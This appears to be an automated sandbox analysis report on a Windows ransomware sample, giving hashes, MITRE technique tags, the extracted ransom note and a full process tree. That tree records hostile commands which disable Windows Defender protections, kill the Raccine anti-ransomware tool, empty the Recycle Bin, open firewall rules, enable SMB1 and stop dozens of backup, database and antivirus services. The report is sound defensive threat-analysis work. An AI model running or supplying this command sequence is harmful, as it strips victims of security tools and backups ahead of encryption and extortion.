2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
12s
max time network
155s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Size

481KB
MD5

50379b825ba54e395092a73fb4b6e399
SHA1

8171cf970cbd3746c74143d4933e4f2a69e1ea7e
SHA256

02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f
SHA512

42015ac9b4a3b33adda1d1c538cc33126d72f6f8ccbd4d72b58485971a0b03b9e17908d304f6e9d3a2fe389741995618ce3ce6520bec3e62930fb11b741f090d

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Instruction.txt

Ransom Note

Hello. Your files, documents, photo, databases and all the rest aren't REMOVED. They are ciphered by the most reliable enciphering. It is impossible to restore files without our help. You will try to restore files independent you will lose files FOREVER. ---------------------------------------------------------- You will be able to restore files so: 1. to contact us by e-mail: [email protected] * report your ID and we will switch off any removal of files (if don't report your ID identifier, then each 24 hours will be to be removed on 24 files. If report to ID-we will switch off it) * you send your ID identifier and 2 files, up to 2 MB in size everyone. We decipher them, as proof of a possibility of interpretation. also you receive the instruction where and how many it is necessary to pay. 2. you pay and confirm payment. 3. after payment you receive the DECODER program. which you restore ALL YOUR FILES. ---------------------------------------------------------- You have 72 hours on payment. If you don't manage to pay in 72 hours, then the price of interpretation increases twice. The price increases twice each 72 hours. To restore files, without loss, and on the minimum tariff, you have to pay within 72 hours. Address for detailed instructions e-mail: [email protected] If you don't waste time for attempts to decipher, then you will be able to restore all files in 1 hour. If you try to decipher - you can FOREVER lose your files. e-mail: [email protected] Key Identifier: SLdaGCF4ew8t/9t0D4EHVnZF4HNwA9H0Ll6SD1DvUrhjH3w+qSQ7E7k63GZ7g78iOL7PZ5u3WlLOYFYXzIVDtCRq1aplveI6YC4NPS4vkRhZR9YMlt1hBkjlshxKVW4A1f4mtEv2EVjfZso+cd1hrOhln8MCNnh1iXkvBi+4/8E5Nn3ugCFRb2o6MxsQsUc6hGzSr9te6sJwOV8CEDKcwpyRgW9tzgs0Mrudw0OpgZHrgHohBvBYmP6588VKISli8yDQAt9BtRGcEgMpnULhA8i75UggGUwuYXXp9tCNeaG/AS0Zcctg30e/bh45gI9cuDrEhGAKCt5kGgB+7YZDTkAak8RFRMyZPGtjP2LKowDn76iGpRsiI/g0uIDQauvGV/bdvefJJXpfG4uF47xUXJTqeayShdkthpY13JqX4Tfi4QW2Ybyx7ve7xCLi+L16q1oF4HS02fIb+ArJ5gkh5IkEA6U6xXgfIgubPKjZsNnx+fsV5rB8pzBFNQ4lK3ZiIVZYHym6DaTcYmjcPvjpErOSkgGfG4y/SD3fEnmvKEUoegUyimBZ9aeOTZxsRcgErjXhDOdcIvy9EHKQO2KH4M47/wFpsAjnvuKlq1rbMbY9gJIbN3qY4Z41EpuMmgyr7ZIPkp6LAGdvUU2ZhHeJD6etxW4dv/nxmOsMibxThaQ=

Emails

[email protected]

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6028	icacls.exe
6048	icacls.exe
6056	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3268	net.exe

Kills process with taskkill 48 IoCs

evasion

pid	Process
5852	taskkill.exe
5712	taskkill.exe
5968	taskkill.exe
5656	taskkill.exe
5624	taskkill.exe
5752	taskkill.exe
5936	taskkill.exe
5876	taskkill.exe
5836	taskkill.exe
5812	taskkill.exe
5804	taskkill.exe
5764	taskkill.exe
5688	taskkill.exe
5976	taskkill.exe
5632	taskkill.exe
5704	taskkill.exe
5944	taskkill.exe
5828	taskkill.exe
5796	taskkill.exe
5788	taskkill.exe
5772	taskkill.exe
5696	taskkill.exe
5664	taskkill.exe
5952	taskkill.exe
5640	taskkill.exe
5648	taskkill.exe
5984	taskkill.exe
5844	taskkill.exe
5820	taskkill.exe
5736	taskkill.exe
5992	taskkill.exe
6000	taskkill.exe
5928	taskkill.exe
5900	taskkill.exe
5860	taskkill.exe
5728	taskkill.exe
5680	taskkill.exe
5672	taskkill.exe
5744	taskkill.exe
5916	taskkill.exe
5908	taskkill.exe
5960	taskkill.exe
5892	taskkill.exe
5884	taskkill.exe
5868	taskkill.exe
5780	taskkill.exe
1596	taskkill.exe
5720	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
432	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	30
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	30
PID 372 wrote to memory of 1684	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	30
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	621
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	621
PID 372 wrote to memory of 468	372	02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe	621

C:\Users\Admin\AppData\Local\Temp\02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe"
1⤵
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  PID:468
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5212
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1836
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1140
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1840
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:5288
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:5260
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2184
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4744
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:2556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:3048
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:2524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:2216
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2616
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2640
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4896
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2920
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:3000
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:6212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  PID:2116
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6180
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:7060
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:2904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:4640
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6808
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:6924
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:2872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:2372
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:1112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:6796
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:2024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:7040
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:2800
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:4728
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:7208
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:2548
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:2104
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:6608
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2372
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:4972
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:5288
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:7220
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:7184
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:3928
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:7952
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:3664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:7832
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:3656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:7240
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:3648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:7176
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:7200
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:5204
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:2524
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:7364
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6556
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:3528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:7192
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:7312
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:3512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:7688
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:7696
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:3488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:968
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:7444
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2328
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:7396
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:7824
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:4744
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:8060
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:7680
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:8084
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:3088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:8008
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3272
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:8028
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:2448
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5252
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:2528
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:4712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3280
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:2876
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:4720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:4552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:8136
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:4544
